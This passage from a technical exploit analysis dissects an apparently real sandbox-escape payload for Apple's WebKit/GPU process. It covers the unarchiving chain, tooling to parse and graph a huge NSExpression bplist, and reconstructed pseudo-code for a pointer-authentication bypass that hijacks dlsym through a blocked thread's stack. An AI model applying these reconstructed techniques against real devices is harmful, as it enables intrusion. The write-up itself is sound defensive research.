  NSType type;

  if (!decoder.decode(type))

    return std::nullopt;

In this case, rather than knowing the type to decode upfront they decode a type dword from the message and choose a deserializer not based on what type they expect, but what type the message claims to contain:

switch (type) {

  case NSType::Array:

    return decodeArrayInternal(decoder, allowedClasses);

  case NSType::Color:

    return decodeColorInternal(decoder);

  case NSType::Dictionary:

    return decodeDictionaryInternal(decoder, allowedClasses);

  case NSType::Font:

    return decodeFontInternal(decoder);

  case NSType::Number:

    return decodeNumberInternal(decoder);

  case NSType::SecureCoding:

    return decodeSecureCodingInternal(decoder, allowedClasses);

  case NSType::String:

    return decodeStringInternal(decoder);

  case NSType::Date:

    return decodeDateInternal(decoder);

  case NSType::Data:

    return decodeDataInternal(decoder);

  case NSType::URL:

    return decodeURLInternal(decoder);

  case NSType::CF:

    return decodeCFInternal(decoder);

  case NSType::Unknown:

    break;

}


In this case they choose type 7, which corresponds to NSType::SecureCoding, decoded by calling decodeSecureCodingInternal which allocates an NSKeyedUnarchiver initialized with data from the IPC message:

auto unarchiver =

  adoptNS([[NSKeyedUnarchiver alloc]

           initForReadingFromData:

             bridge_cast(data.get()) error:nullptr]);

The code adds a few more classes to the allow-list to be decoded:

auto allowedClassSet =

  adoptNS([[NSMutableSet alloc] initWithArray:allowedClasses]);

[allowedClassSet addObject:WKSecureCodingURLWrapper.class];

[allowedClassSet addObject:WKSecureCodingCGColorWrapper.class];

if ([allowedClasses containsObject:NSAttributedString.class]) {

  [allowedClassSet

    unionSet:NSAttributedString.allowedSecureCodingClasses];

}

then unarchives the object:

id result =

  [unarchiver decodeObjectOfClasses:

                allowedClassSet.get()

              forKey:

                NSKeyedArchiveRootObjectKey];

The serialized root object sent by the attackers is a WKSecureCodingURLWrapper. Deserialization of this is allowed because it was explicitly added to the allow-list above. Here's the WKSecureCodingURLWrapper::initWithCoder implementation:

- (instancetype)initWithCoder:(NSCoder *)coder

{

  auto selfPtr = adoptNS([super initWithString:@""]);

  if (!selfPtr)

    return nil;

  BOOL hasBaseURL;

  [coder decodeValueOfObjCType:"c"

         at:&hasBaseURL

         size:sizeof(hasBaseURL)];

  RetainPtr<NSURL> baseURL;

  if (hasBaseURL)

    baseURL =

     (NSURL *)[coder decodeObjectOfClass:NSURL.class

                     forKey:baseURLKey];

...

}

This in turn decodes an NSURL, which decodes an NSString member named "NS.relative". The attackers instead supply a subclass of NSString, _NSLocalizedString, whose deserialization sets up the following allow-list:

  v10 = objc_opt_class_385(&OBJC_CLASS___NSDictionary);

  v11 = objc_opt_class_385(&OBJC_CLASS___NSArray);

  v12 = objc_opt_class_385(&OBJC_CLASS___NSNumber);

  v13 = objc_opt_class_385(&OBJC_CLASS___NSString);

  v14 = objc_opt_class_385(&OBJC_CLASS___NSDate);

  v15 = objc_opt_class_385(&OBJC_CLASS___NSData);

  v17 = objc_msgSend_setWithObjects__0(&OBJC_CLASS___NSSet, v16, v10, v11, v12, v13, v14, v15, 0LL);

  v20 = objc_msgSend_decodeObjectOfClasses_forKey__0(a3, v18, v17, CFSTR("NS.configDict"));

They then deserialize an NSSharedKeyDictionary (which is a subclass of NSDictionary):

-[NSSharedKeyDictionary initWithCoder:]

...

v6 = objc_opt_class_388(&OBJC_CLASS___NSSharedKeySet);

...

 v11 = (__int64)objc_msgSend_decodeObjectOfClass_forKey__4(a3, v8, v6, CFSTR("NS.skkeyset"));

NSSharedKeyDictionary then adds NSSharedKeySet to the allow-list and decodes one.

But recall that using the arbitrary write they've swapped the implementation class used by NSSharedKeySet to instead be PrototypeTools::_OBJC_CLASS___PTModule! This means that initWithCoder is now actually going to be called on a PTModule. And because they also flipped all the relevant security mitigation bits, unarchiving a PTModule will have the same side effect as it did in FORCEDENTRY of evaluating an NSFunctionExpression. Except rather than a few kilobytes of serialized NSFunctionExpression, this time it's half a megabyte. Things are only getting started!


Part II - Data Is All You Need

NSKeyedArchiver objects are serialized as bplist objects. Extracting the bplist out of the exploit binary we can see that it's 437KB! The first thing to do is just run strings to get an idea of what might be going on. There are lots of strings we'd expect to see in a serialized NSFunctionExpression:

NSPredicateOperator_

NSRightExpression_

NSLeftExpression

NSComparisonPredicate[NSPredicate

^NSSelectorNameYNSOperand[NSArguments

NSFunctionExpression\NSExpression

NSConstantValue

NSConstantValueExpressionTself

\NSCollection

NSAggregateExpression

There are some indications that they might be doing some much more complicated stuff like executing arbitrary syscalls:

syscallInvocation

manipulating locks:

os_unfair_unlock_0x34

%os_unfair_lock_0x34InvocationInstance

spinning up threads:

.detachNewThreadWithBlock:_NSFunctionExpression

detachNewThreadWithBlock:

!NSThread_detachNewThreadWithBlock

XNSThread

3NSThread_detachNewThreadWithBlockInvocationInstance

6NSThread_detachNewThreadWithBlockInvocationInstanceIMP

pthreadinvocation

pthread____converted

yWpthread

pthread_nextinvocation

pthread_next____converted

and sending and receiving mach messages:

mach_msg_sendInvocation

mach_msg_receive____converted

 mach_make_memory_entryInvocation

mach_make_memory_entry

#mach_make_memory_entryInvocationIMP

as well as interacting with IOKit:

IOServiceMatchingInvocation

IOServiceMatching

IOServiceMatchingInvocationIMP

In addition to these strings there are also three fairly large chunks of javascript source which look rather suspicious:

var change_scribble=[.1,.1];change_scribble[0]=.2;change_scribble[1]=.3;var scribble_element=[.1];

...

Starting up

Last time I analysed one of these I used plutil to dump out a human-readable form of the bplist. The object was small enough that I was then able to reconstruct the serialized object by hand. This wasn't going to work this time:

$ plutil -p bplist_raw | wc -l

   58995

Here's a random snippet a few tens of thousands of lines in:

14319 => {

  "$class" =>

    <CFKeyedArchiverUID 0x600001b32f60 [0x7ff85d4017d0]>

      {value = 29}

  "NSConstantValue" =>

    <CFKeyedArchiverUID 0x600001b32f40 [0x7ff85d4017d0]>

      {value = 14320}

}

14320 => 2

14321 => {

  "$class" =>

    <CFKeyedArchiverUID 0x600001b32fe0 [0x7ff85d4017d0]>

      {value = 27}

  "NSArguments" =>

    <CFKeyedArchiverUID 0x600001b32fc0 [0x7ff85d4017d0]>

      {value = 14323}

  "NSOperand" =>

    <CFKeyedArchiverUID 0x600001b32fa0 [0x7ff85d4017d0]>

      {value = 14319}

  "NSSelectorName" =>

    <CFKeyedArchiverUID 0x600001b32f80 [0x7ff85d4017d0]>

      {value = 14322}

There are a few possible analysis approaches here: I could just deserialize the object using NSKeyedUnarchiver and see what happens (potentially using dtrace to hook interesting places) but I didn't want to just learn what this serialized object does - I wanted to know how it works.

Another option would be parsing the output of plutil but I figured this was likely almost as much work as parsing the bplist from scratch so I decided to just write my own bplist and NSArchiver parser and go from there.

This might seem like overdoing it, but with such a huge object it was likely I was going to need to be in the position to manipulate the object quite a lot to figure out how it actually worked.

bplist

Fortunately, bplist isn't a very complicated serialization format and only takes a hundred or so lines of code to implement. Furthermore, I didn't need to support all the bplist features, just those used in the single serialized object I was investigating.

This blog post gives a great overview of the format and also links to the CoreFoundation .c file containing a comment defining the format.

A bplist serialized object has 4 sections:

  • header
  • objects
  • offsets
  • trailer

The objects section contains all the serialized objects one after the other. The offsets table contains the byte offset of each object within the file. Compound objects (arrays, sets and dictionaries) can then reference other objects via indexes into the offsets table.

bplist only supports a small number of built-in types:

null, bool, int, real, date, data, ascii string, unicode string, uid, array, set and dictionary

The serialized form of each type is pretty straightforward, and explained clearly in this comment in CFBinaryPlist.c:

Object Formats (marker byte followed by additional info in some cases)

null   0000 0000

bool   0000 1000           // false

bool   0000 1001           // true

fill   0000 1111           // fill byte

int    0001 nnnn ...       // # of bytes is 2^nnnn, big-endian bytes

real   0010 nnnn ...       // # of bytes is 2^nnnn, big-endian bytes

date   0011 0011 ...       // 8 byte float follows, big-endian bytes

data   0100 nnnn [int] ... // nnnn is number of bytes unless 1111 then int count follows, followed by bytes

string 0101 nnnn [int] ... // ASCII string, nnnn is # of chars, else 1111 then int count, then bytes

string 0110 nnnn [int] ... // Unicode string, nnnn is # of chars, else 1111 then int count, then big-endian 2-byte uint16_t

       0111 xxxx           // unused

uid    1000 nnnn ...       // nnnn+1 is # of bytes

       1001 xxxx           // unused

array  1010 nnnn [int] objref*         // nnnn is count, unless '1111', then int count follows

       1011 xxxx                       // unused

set    1100 nnnn [int] objref*         // nnnn is count, unless '1111', then int count follows

dict   1101 nnnn [int] keyref* objref* // nnnn is count, unless '1111', then int count follows

       1110 xxxx // unused

       1111 xxxx // unused

It's a Type-Length-Value encoding with the type field in the upper nibble of the first byte. There's some subtlety to decoding the variable sizes correctly, but it's all explained fairly well in the CF code. The keyref* and objref* are indexes into the eventual array of deserialized objects; the bplist header defines the size of these references (so a small object with up to 256 objects could use a single byte as a reference.)
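To make that concrete, here's a minimal sketch of such a parser in Python, handling just the subset of types this object needs. The structure follows the CF comment quoted above; all the function names are mine:

import struct

def parse_bplist(data):
    assert data[:8] == b"bplist00"
    # 32-byte trailer: 6 unused/sort bytes, offset-int size, objref size,
    # object count, top object index, offset table position (big-endian).
    off_size, ref_size, n_objs, top, table_off = struct.unpack(
        ">6xBBQQQ", data[-32:])
    offsets = [int.from_bytes(data[table_off + i * off_size:
                                   table_off + (i + 1) * off_size], "big")
               for i in range(n_objs)]

    def read_int(pos, nbytes):
        return int.from_bytes(data[pos:pos + nbytes], "big"), pos + nbytes

    def count(pos, low):
        # a low nibble of 0xf means a full int object follows with the count
        if low != 0xf:
            return low, pos
        nbytes = 1 << (data[pos] & 0xf)        # int marker: 0001 nnnn
        return read_int(pos + 1, nbytes)

    def parse_object(idx):
        pos = offsets[idx]
        marker, low = data[pos], data[pos] & 0xf
        pos += 1
        if marker == 0x00:                     # null
            return None
        if marker in (0x08, 0x09):             # bool
            return marker == 0x09
        kind = marker >> 4
        if kind == 0x1:                        # int: 2^nnnn big-endian bytes
            return read_int(pos, 1 << low)[0]
        if kind == 0x4:                        # data
            n, pos = count(pos, low)
            return data[pos:pos + n]
        if kind == 0x5:                        # ascii string
            n, pos = count(pos, low)
            return data[pos:pos + n].decode("ascii")
        if kind == 0x8:                        # uid: nnnn+1 bytes
            return ("uid", read_int(pos, low + 1)[0])
        if kind in (0xa, 0xc, 0xd):            # array / set / dict of objrefs
            n, pos = count(pos, low)
            n_refs = 2 * n if kind == 0xd else n
            refs = [int.from_bytes(data[pos + i * ref_size:
                                        pos + (i + 1) * ref_size], "big")
                    for i in range(n_refs)]
            # NSKeyedArchiver output is acyclic at the bplist layer (cycles
            # are expressed via uids instead), so plain recursion is safe.
            vals = [parse_object(r) for r in refs]
            if kind == 0xd:                    # keyrefs first, then objrefs
                return dict(zip(vals[:n], vals[n:]))
            return vals
        raise ValueError("unhandled marker %#04x" % marker)

    return parse_object(top)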

Parsing the bplist and printing it ends up with an object with this format:

dict {

  ascii("$top"):

    dict {

      ascii("root"):

        uid(0x1)

    }

  ascii("$version"):

    int(0x186a0)

  ascii("$objects"):

    array [

      [+0]:

        ascii("$null")

      [+1]:

        dict {

          ascii("NS.relative"):

            uid(0x3)

          ascii("WK.baseURL"):

            uid(0x3)

          ascii("$0"):

            int(0xe)

          ascii("$class"):

            uid(0x2)

        }

      [+2]:

        dict {

          ascii("$classes"):

            array [

              [+0]:

                ascii("WKSecureCodingURLWrapper")

              [+1]:

                ascii("NSURL")

              [+2]:

                ascii("NSObject")

            ]

          ascii("$classname"):

            ascii("WKSecureCodingURLWrapper")

        }

...

The top level object in this bplist is a dictionary with three entries:

$version: int(100000)

$top: uid(1)

$objects: an array of dictionaries

This is the top-level format for an NSKeyedArchiver. Indirection in NSKeyedArchivers is done using the uid type, where the values are integer indexes into the $objects array. (Note that this is an extra layer of indirection, on top of the keyref/objref indirection used at the bplist layer.)

The $top dictionary has a single key "root" with value uid(1) indicating that the object serialized by the NSKeyedArchiver is encoded as the second entry in the $objects array.

Each object encoded within the NSKeyedArchiver effectively consists of two dictionaries: one defining its properties and one defining its class. Tidying up the sample above (since dictionary keys are all ascii strings) the properties dictionary for the first object looks like this:

{

  NS.relative : uid(0x3)

  WK.baseURL :  uid(0x3)

  $0 :          int(0xe)

  $class :      uid(0x2)

}

The $class key tells us the type of object which is serialized. Its value is uid(2) which means we need to go back to the objects array and find the dictionary at that index:

{

  $classname : "WKSecureCodingURLWrapper"

  $classes   : ["WKSecureCodingURLWrapper",

                "NSURL",

                "NSObject"]

}

Note that in addition to telling us the final class (WKSecureCodingURLWrapper) it also defines the inheritance hierarchy. The entire serialized object consists of a fairly enormous graph of these two types of dictionaries defining properties and types.

It shouldn't be a surprise to see WKSecureCodingURLWrapper here; we saw it right at the end of the first section.
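Chasing that uid indirection is mechanical; a couple of helpers on top of the parser sketch above (which represented uids as ("uid", n) tuples) are enough for the rest of the analysis:

def deref(archive, obj):
    # Chase ("uid", n) references into the $objects array.
    while isinstance(obj, tuple) and obj[0] == "uid":
        obj = archive["$objects"][obj[1]]
    return obj

def classname_of(archive, serialized_obj):
    # $class is a uid pointing at the class-description dictionary.
    return deref(archive, serialized_obj["$class"])["$classname"]

# root = deref(archive, archive["$top"]["root"])
# classname_of(archive, root)   # -> "WKSecureCodingURLWrapper"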

Finding the beginning

Since we have a custom parser we can start dumping out subsections of the object graph looking for the NSExpressions. In the end we can follow these properties to find an array of PTSection objects, each of which contains multiple PTRow objects, each with an associated condition in the form of an NSComparisonPredicate:

sections = follow(root_obj, ['NS.relative', 'NS.relative', 'NS.configDict', 'NS.skkeyset', 'components', 'NS.objects'])
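(follow is a small helper in the parser which walks a chain of named properties; a minimal sketch on top of deref from above, with the archive passed explicitly:)

def follow(archive, obj, keys):
    # Walk a chain of property names, resolving uid references at each step.
    for key in keys:
        obj = deref(archive, deref(archive, obj)[key])
    return obj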

Each of those PTRows contains a single predicate to evaluate - in the end the relevant parts of the payload are contained entirely in four NSExpressions.

Types

There are only a handful of primitive NSExpression family objects from which the graph is built:

NSComparisonPredicate

  NSLeftExpression

  NSRightExpression

  NSPredicateOperator

Evaluate the left and right side then return the result of comparing them with the given operator.

NSFunctionExpression

  NSSelectorName

  NSArguments

  NSOperand

Send the provided selector to the operand object passing the provided arguments, returning the return value

NSConstantValueExpression

  NSConstantValueClassName

  NSConstantValue

A constant value or Class object

NSVariableAssignmentExpression

  NSAssignmentVariable

  NSSubexpression

Evaluate the NSSubexpression and assign its value to the named variable

NSVariableExpression

  NSVariable

Return the value of the named variable

NSCustomPredicateOperator

  NSSelectorName

The name of a selector to invoke as a comparison operator

NSTernaryExpression

  NSPredicate

  NSTrueExpression

  NSFalseExpression

Evaluate the predicate then evaluate either the true or false branch depending on the value of the predicate.

E2BIG

The problem is that the object graph is simply enormous with very deep nesting. Attempts to perform simple transforms of the graph to a text representation quickly became incomprehensible with over 40 layers of nesting.

It's very unlikely that whoever crafted this serialized object actually wrote the entire payload as a single expression. Much more likely is that they used some tricks and tooling to turn a sequential series of operations into a single statement. But to figure those out we still need a better way to see what's going on.

Going DOTty

This object is a graph - so rather than trying to immediately transform it to text why not try to visualize it as a graph instead?

DOT is the graph description language used by graphviz - an open-source graph drawing package. It's pretty simple:

digraph {

 A -> B

 B -> C

 C -> A

}

Diagram showing a three-node DOT graph with a cycle from A to B to C to A.

You can also define nodes and edges separately and apply properties to them:

digraph {

A [shape=square]

B [label="foo"]

 A -> B

 B -> C

 C -> A [style=dotted]

}

A simple 3 node diagram showing different DOT node and edge styles
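Emitting DOT from the parsed archive only takes a few more lines on top of the earlier helpers; a minimal sketch (one node per archived object, labelled with its class name, one edge per uid-valued property):

def emit_dot(archive, out):
    objects = archive["$objects"]
    out.write("digraph expr {\n")
    for idx, obj in enumerate(objects):
        if not isinstance(obj, dict) or "$class" not in obj:
            continue
        out.write('  n%d [label="%s"]\n' % (idx, classname_of(archive, obj)))
        for key, val in obj.items():
            if key == "$class":
                continue
            # a property is either a single uid or an array containing uids
            for target in (val if isinstance(val, list) else [val]):
                if isinstance(target, tuple) and target[0] == "uid":
                    out.write('  n%d -> n%d [label="%s"]\n'
                              % (idx, target[1], key))
    out.write("}\n")

# emit_dot(archive, open("expr.dot", "w"))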

With the custom parser it's relatively easy to emit a dot representation of the entire NSExpression graph. But when it comes time to actually render it, progress is rather slow...

After leaving it overnight without success it seemed that perhaps a different approach was required. Graphviz is certainly capable of rendering a graph with tens of thousands of nodes; the part which is likely failing is graphviz's attempt to lay out the nodes in a clean way.

Medium data

Maybe some of the tools explicitly designed for interactively exploring large datasets could help here. I chose to use Gephi, an open-source graph visualization platform.

I loaded the .dot file into Gephi and waited for the magic:

A screenshot of Gephi showing a graph with thousands of overlapping nodes rendered into an almost solid square of indistinguishable circles and arrows

This might take some more work.

Directing forces

The default layout seems to just position all the nodes equally in a square - not particularly useful. But using the layout menu on the left we can choose layouts which might give us some insight. Here's a force-directed layout, which emphasizes highly-connected nodes:

Screenshot of Gephi showing a large complex graph where the nodes are distinguishable and there is some clustering

Much better! I then started to investigate which nodes have large in- or out-degrees and to figure out why. For example here we can see that a node with the label func:alloc has a huge in-degree.

Screenshot of Gephi showing the func:alloc node with a very large number of incoming graph edges

Trying to lay out the graph with nodes with such high in-degrees just leads to a mess (and was potentially what was slowing the graphviz tools down so much) so I started adding hacks to the custom parser to duplicate certain nodes while maintaining the semantics of the expression in order to minimize the number of crossing edges in the graph.
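One way to implement that hack on top of the emit_dot sketch above: wherever it would emit the fixed target name for an edge, call a helper like this instead (the set of labels to clone is whatever you discover interactively; the picture changes but the semantics of the expression don't):

import itertools

CLONE_LABELS = {"func:alloc"}   # high in-degree nodes to split per edge
_fresh = itertools.count()

def edge_target(out, labels, idx):
    # Emit a dedicated clone of a high in-degree node for each incoming edge.
    if labels[idx] in CLONE_LABELS:
        clone = "n%d_c%d" % (idx, next(_fresh))
        out.write('  %s [label="%s"]\n' % (clone, labels[idx]))
        return clone
    return "n%d" % idx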

During this iterative process I ended up creating the graph shown at the start of this writeup, when only a handful of high in-degree nodes remained and the rest separated cleanly into clusters:

A graph rendering of the sandbox escape NSExpression payload node graph, with an eerie similarity to a human eye

Flattening

Although this created a large number of extra nodes in the graph it turns out that this made things much easier for graphviz to lay out. It still can't do the whole graph, but we can now split it into chunks which successfully render to very large SVGs. The advantage of switching back to graphviz is that we can render arbitrary information with custom node and edge labels. For example using custom shape primitives to make the arrays of NSFunctionExpression arguments stand out more clearly:

Diagram showing an NSExpression subgraph performing a bitwise operation and using variables

Here we can see nested related function calls, where the intention is clearly to pass the return value from one call as the argument to another. Starting in the bottom right of the graph shown above we can work backwards (towards the top left) to reconstruct pseudo-objective-c:

[writeInvocationName

  getArgument:

    [ [_NSPredicateUtils

        bitwiseOr: [NSNumber numberWithUnsignedLongLong:

                              [intermediateAddress: bytes]]

        with: @0x8000000000000000]] longLongValue ]

  atIndex: [@0x1 longLongValue] ]

We can also now clearly see the trick they use to execute multiple unrelated statements:

Diagram showing a graph of NSNull alloc nodes tying unrelated statements together

Multiple unrelated expressions are evaluated sequentially by passing them as arguments to an NSFunctionExpression calling [NSNull alloc]. This is a method which takes no arguments and has no side-effects (the NSNull is a singleton and alloc returns a global pointer) but the NSFunctionExpression evaluation will still evaluate all the provided arguments then discard them.

They build a huge tree of these [NSNull alloc] nodes which allows them to sequentially execute unrelated expressions.

Diagram showing nodes and edges in a tree of NSNull alloc NSFunctionExpressions

Connecting the dots

Since the return values of the evaluated arguments are discarded they use NSVariableExpressions to connect the statements semantically. These are a wrapper around an NSDictionary object which can be used to store named values. Using the custom parser we can see there are 218 different named variables. Interestingly, whilst the exploit's Mach-O binary is stripped and all symbols were removed, that's not the case for the NSVariables - we can see their full (presumably original) names.

bplist_to_objc

Having figured out the NSNull trick they use for sequential expression evaluation it's now possible to flatten the graph to pseudo-objective-c code, splitting each argument to an [NSNull alloc] NSFunctionExpression into separate statements:

id v_detachNewThreadWithBlock:_NSFunctionExpression = [NSNumber numberWithUnsignedLongLong:[[[NSFunctionExpression alloc] initWithTarget:@"target" selectorName:@"detachNewThreadWithBlock:" arguments:@[] ] selector] ];

This is getting closer to a decompiler-type output. It's still a bit jumbled, but significantly more readable than the graph and can be refactored in a code editor.
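The flattening pass itself is short once the trick is known. A sketch on the helpers from earlier - the operand check here is my approximation of what distinguishes the sequencing nodes:

def is_nsnull_alloc(archive, expr):
    # Heuristic: an NSFunctionExpression sending "alloc" to an NSNull
    # constant-value expression (key names per the type list above).
    if classname_of(archive, expr) != "NSFunctionExpression":
        return False
    if deref(archive, expr["NSSelectorName"]) != "alloc":
        return False
    operand = deref(archive, expr["NSOperand"])
    return deref(archive, operand.get("NSConstantValueClassName")) == "NSNull"

def flatten(archive, expr, statements):
    # Arguments of an [NSNull alloc] call are really sequential statements,
    # so recurse through them in evaluation order; everything else is a
    # statement in its own right.
    expr = deref(archive, expr)
    if is_nsnull_alloc(archive, expr):
        for arg in deref(archive, expr["NSArguments"])["NS.objects"]:
            flatten(archive, arg, statements)
    else:
        statements.append(expr)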

Helping out

The expressions make use of NSPredicateUtilities for arithmetic and bitwise operations. Since we don't have to support arbitrary input, we can just hardcode the selectors which implement those operations and emit a more readable helper function call instead:

      if selector_str == 'bitwiseOr:with:':

        arg_vals = follow(o, ['NSArguments', 'NS.objects'])

        s += 'set_msb(%s)' % parse_expression(arg_vals[0], depth+1)

      elif selector_str == 'add:to:':

        arg_vals = follow(o, ['NSArguments', 'NS.objects'])

        s += 'add(%s, %s)' % (parse_expression(arg_vals[0], depth+1), parse_expression(arg_vals[1], depth+1))

This yields arithmetic statements which look like this:

[v_dlsym_lock_ptrinvocation setArgument:[set_msb(add(v_OOO_dyld_dyld, @0xa0)) longLongValue] atIndex:[@0x2 longLongValue] ];

but...why?

After all that we're left with around 1000 lines of sort-of readable pseudo-objective-C. There are a number of further tricks they use to implement things like arbitrary read and write which I manually replaced with simple assignment statements.

The attackers are already in a very strong position at this point; they can evaluate arbitrary NSExpressions, with the security bits disabled such that they can still allocate and interact with arbitrary classes. But in this case the attackers are determined to be able to call arbitrary functions, without being restricted to just Objective-C selector invocations.

The major barrier to doing this easily is PAC (pointer authentication.) The B-family PAC keys used for backwards-edge protection (e.g. return addresses on the stack) were always per-process but the A-family keys (used for forward-edge protection for things like function pointers) used to be shared across all userspace processes, meaning userspace tasks could forge signed forward-edge PAC'ed pointers which would be valid in other tasks.

With some low-level changes to the virtual memory code it's now possible for tasks to use private, isolated A-family keys as well, which means that the WebContent process can't necessarily forge forward-edge keys for other tasks (like the GPU Process.)

Most previous userspace PAC defeats involved finding a way for a forged forward-edge function pointer to be used across a privilege boundary - and when forward-edge keys were shared there were a great number of such primitives. Kernel PAC defeats tended to be slightly more involved, often targeting race conditions to create signing oracles or similar primitives. We'll see that the attackers took inspiration from those kernel PAC defeats here...

Invoking Invocations with IMPs

An NSInvocation, as the name suggests, wraps up an Objective-C method call such that it can be called at a later point. Although conceptually in Objective-C you don't "call methods" but instead "pass messages to objects" in reality of course you do end up eventually at a branch instruction to the native code which implements the selector for the target object. It's also possible to cache the address of this native code as an IMP object (it's really just a function pointer.)

As outlined in the see-no-eval NSExpression blogpost NSInvocations can be used to get instruction pointer control from NSExpressions - with the caveat that you must provide a signed PC value. The first method they call using this primitive is the implementation of [CFPrefsSource lock]:

; void __cdecl -[CFPrefsSource lock](CFPrefsSource *self, SEL)

ADD  X0, X0, #0x34

B    _os_unfair_lock_lock

They get a signed (with PACIZA) IMP for this function by calling

id os_unfair_lock_0x34_IMP = [[CFPrefsSource alloc] methodForSelector: sel(lock)]

To call that function they use two nested NSInvocations:

id invocationInner = [templateInvocation copy];

[invocationInner setTarget:(dlsym_lock_ptr - 0x34)]

[invocationInner setSelector: [@0x43434343 longLongValue]]

id invocationOuter = [templateInvocation copy];

[invocationOuter setSelector: sel(invokeUsingIMP)];

[invocationOuter setArgument: os_unfair_lock_0x34_IMP

                   atIndex: @2];

They then call invoke on the outer invocation, which invokes the inner invocation via invokeUsingIMP: which allows the [CFPrefsSource lock] function implementation to be called on something which most certainly isn't a CFPrefsSource object (as invokeUsingIMP: bypasses the regular Objective-C selector-to-IMP lookup process.)

Lock what?

But what is that lock, and why are they locking it? That lock is used here inside dlsym:

// dlsym() assumes symbolName passed in is same as in C source code

// dyld assumes all symbol names have an underscore prefix

BLOCK_ACCCESSIBLE_ARRAY(char, underscoredName, strlen(symbolName) + 2);

underscoredName[0] = '_';

strcpy(&underscoredName[1], symbolName);

__block Diagnostics diag;

__block Loader::ResolvedSymbol result;

if ( handle == RTLD_DEFAULT ) {

  // magic "search all in load order" handle

  __block bool found = false;

  withLoadersReadLock(^{

    for ( const dyld4::Loader* image : loaded ) {

      if ( !image->hiddenFromFlat() && image->hasExportedSymbol(diag, *this, underscoredName, Loader::shallow, &result) ) {

        found = true;

        break;

      }

    }

  });

withLoadersReadLock first takes the global lock - the very lock which the invocation locked above - before evaluating the block which resolves the symbol:

this->libSystemHelpers->os_unfair_recursive_lock_lock_with_options(

  &(_locks.loadersLock),

  OS_UNFAIR_LOCK_NONE);

work();

this->libSystemHelpers->os_unfair_recursive_lock_unlock(

  &_locks.loadersLock);

So by taking this lock the NSExpression has ensured that any calls to dlsym in the GPU process will block waiting for this lock.

Threading the needle

Next they use the same double-invocation trick to make the following Objective-C call:

[NSThread detachNewThreadWithBlock:aBlock]

passing as the block argument a pointer to a block inside the CoreGraphics library with the following body:

void *__CGImageCreateWithPNGDataProvider_block_invoke_2()

{

  void *sym;

  if ( CGLibraryLoadImageIODYLD_once != -1 ) {

    dispatch_once(&CGLibraryLoadImageIODYLD_once,

                  &__block_literal_global_5_15015);

  }

  if ( !CGLibraryLoadImageIODYLD_handle ) {

    // fail

  }

  sym = dlsym(CGLibraryLoadImageIODYLD_handle,

                 "CGImageSourceGetType");

  if ( !sym ) {

    // fail

  }

  CGImageCreateWithPNGDataProvider = sym;

  return sym;

}

Prior to starting the thread calling that block they also perform two arbitrary writes to set:

CGLibraryLoadImageIODYLD_once = -1

and

CGLibraryLoadImageIODYLD.handle = RTLD_DEFAULT

This means that the thread running that block will reach the call to:

dlsym(CGLibraryLoadImageIODYLD_handle,

                 "CGImageSourceGetType");

then block inside the implementation of dlsym waiting to take a lock held by the NSExpression.

Sleep and repeat

They call [NSThread sleepForTimeInterval] to sleep on the NSExpression thread to ensure that the victim dlsym thread has started, then read the value of libpthread::___pthread_head, the start of a linked-list of pthreads representing all the running threads (the address of which was linked and rebased by the JS.)

They then use an unrolled loop of 100 NSTernaryExpressions to walk that linked list looking for the last entry (which has a null pthread.next field) which is the most recently-started thread.

They use a hardcoded offset into the pthread struct to find the thread's stack and create an NSData object wrapping the first page of the dlsym thread's stack:

id v_stackData = [NSData dataWithBytesNoCopy:[set_msb(v_stackEnd) longLongValue] length:[@0x4000 longLongValue] freeWhenDone:[@0x0 longLongValue] ];

Recall this code we saw earlier in the dlsym snippet:

// dlsym() assumes symbolName passed in is same as in C source code

// dyld assumes all symbol names have an underscore prefix

BLOCK_ACCCESSIBLE_ARRAY(char, underscoredName, strlen(symbolName) + 2);

underscoredName[0] = '_';

strcpy(&underscoredName[1], symbolName);

BLOCK_ACCESSIBLE_ARRAY is really creating an alloca-style local stack buffer in order to prepend an underscore to the symbol name, which explains why the NSExpression code does this next:

[v_stackData rangeOfData:@"b'_CGImageSourceGetType'" options:[@0x0 longLongValue] range:[@0x0 longLongValue] [@0x4000 longLongValue] ]

This returns an NSRange object defining where the string "_CGImageSourceGetType" appears in that page of the stack.  "CGImageSourceGetType" (without the underscore) is the hardcoded (and constant, in read-only memory) string which the block passes to dlsym.

The NSExpression then calculates the absolute address of that string on the thread stack and uses [NSData getBytes:length:] to write the contents of an NSData object containing the string "_dlsym\0\0" over the start of the  "_CGImageSourceGetType" string on the blocked dlsym thread.

Unlock and go

Using the same tricks as before (but this time using the IMP of [CFPrefsSource unlock]) they unlock the global lock blocking the dlsym thread. This causes the block to continue executing and dlsym to complete, now returning a PACIZA-signed function pointer to dlsym instead of CGImageSourceGetType.

The block then assigns the return value of that call to dlsym to a global variable:

  CGImageCreateWithPNGDataProvider = sym;

The NSExpression calls sleepForTimeInterval again to ensure that the block has completed, then reads that global variable to get a signed function pointer to dlsym!

(It's worth noting that it used to be the case, as documented by Samuel Groß in his iMessage remote exploit writeup, that there were Objective-C methods such as [CNFileServices dlsym:] which would directly give you the ability to call dlsym and get PACIZA-signed function pointers.)

Do look up

Armed with a signed dlsym pointer they use the nested invocation trick to call dlsym 22 times to get 22 more signed function pointers, assigning them to numbered variables:

#define f_def(v_index, sym) \\

  id v_#sym#Invocation = [v_templateInvocation copy];

  [v_#sym#Invocation setTarget:[@0xfffffffffffffffe longLongValue] ];

  [v_#sym#Invocation setSelector:[@"sym" UTF8String] ];

  id v_#sym#InvocationIMP = [v_templateInvocation copy];

  [v_#sym#InvocationIMP setSelector:[v_invokeUsingIMP:_NSFunctionExpression longLongValue] ];

  [v_writeInvocationName setSelector:[v_dlsymPtr longLongValue] ];

  [v_writeInvocationName getArgument:[set_msb([NSNumber numberWithUnsignedLongLong:[v_intermidiateAddress bytes] ]) longLongValue] atIndex:[@0x1 longLongValue] ];

  [v_#sym#InvocationIMP setArgument:[set_msb([NSNumber numberWithUnsignedLongLong:[v_intermidiateAddress bytes] ]) longLongValue] atIndex:[@0x2 longLongValue] ];

  [v_#sym#InvocationIMP setTarget:v_symInvocation ];

  [v_#sym#InvocationIMP invoke];

  id v_#sym#____converted = [NSNumber numberWithUnsignedLongLong:[@0xaaaaaaaaaaaaaaa longLongValue] ];

  [v_#sym#Invocation getReturnValue:[set_msb(add([NSNumber numberWithUnsignedLongLong:v_#sym#____converted ], @0x10)) longLongValue] ];

  id v_#sym# = v_#sym#____converted;

  id v_#index = v_#sym;

}

f_def(0, syscall)

f_def(1, task_self_trap)

f_def(2, task_get_special_port)

f_def(3, mach_port_allocate)

f_def(4, sleep)

f_def(5, mach_absolute_time)

f_def(6, mach_msg)

f_def(7, mach_msg2_trap)

f_def(8, mach_msg_send)

